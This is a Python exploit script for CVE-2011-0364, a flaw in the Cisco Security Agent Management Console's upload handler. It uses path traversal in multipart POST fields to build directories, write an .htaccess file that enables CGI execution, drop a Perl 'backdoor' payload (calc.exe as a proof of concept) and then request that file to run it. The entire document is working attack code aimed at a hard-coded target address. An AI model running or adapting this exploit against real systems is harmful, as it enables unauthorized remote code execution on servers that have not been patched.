#!/usr/bin/env python # Exploits Cisco Security Agent Management Console ‘st_upload’ (CVE-2011-0364) # gerry eisenhaur <gerry.eisenhaur@gmail.com> import httplib import mimetools import StringIO _boundary = mimetools.choose_boundary() _host_uid = 'C087EFAE-05A2-4A0B-9512-E05E5ED84AEB' _csamc = "192.168.0.108" # we need to enable some scripting to get command access htaccess = "Options +Includes +ExecCGI\r\nAddHandler cgi-script gee" perl_path = "#!c:/program files/cisco/csamc/csamc60/perl/5.8.7/bin/mswin32-x86/perl\r\n", backdoor = "exec \"calc.exe\";" def send_request(params=None): buf = StringIO.StringIO() headers = {"Content-type": 'multipart/form-data; boundary=%s' % _boundary} for(key, value) in params.iteritems(): buf.write('--%s\r\n' % _boundary) buf.write('Content-Disposition: form-data; name="%s"' % key) buf.write('\r\n\r\n%s\r\n' % value) buf.write('--' + _boundary + '--\r\n\r\n') body = buf.getvalue() conn = httplib.HTTPSConnection(_csamc) conn.request("POST", "/csamc60/agent", body, headers) response = conn.getresponse() print response.status, response.reason conn.close() def main(): ### Build up required dir tree dirtree = ["../bin/webserver/htdocs/diag/bin", "../bin/webserver/htdocs/diag/bin/webserver", "../bin/webserver/htdocs/diag/bin/webserver/htdocs"] _params = { 'host_uid': _host_uid, 'jobname': None, 'host': "aa", 'diags': " ", 'diagsu': " ", 'profiler': " ", 'extension': "gee", } for path in dirtree: print "[+] Creating directory: %s" % path _params['jobname'] = path send_request(_params) ### Done building path, drop files print "[+] Dropping .htaccess" send_request({ 'host_uid': _host_uid, 'jobname': '', 'host': "/../bin/webserver/", 'diags': "", 'diagsu': "", 'profiler': htaccess, 'extension': "/../.htaccess", }) print "[+] Dropping payload" send_request({ 'host_uid': _host_uid, 'jobname': '', 'host': "/../bin/webserver/htdocs/gerry", 'diags': perl_path, 'diagsu': "", 'profiler': backdoor, 'extension': "/../exploit.gee", }) print "[+] Done, Executing dropped file." try: conn = httplib.HTTPSConnection(_csamc, timeout=1) conn.request("GET", "/csamc60/exploit.gee") response = conn.getresponse() print response.status, response.reason print response.read() except httplib.ssl.SSLError: pass print "[+] Finished." if __name__ == '__main__': main()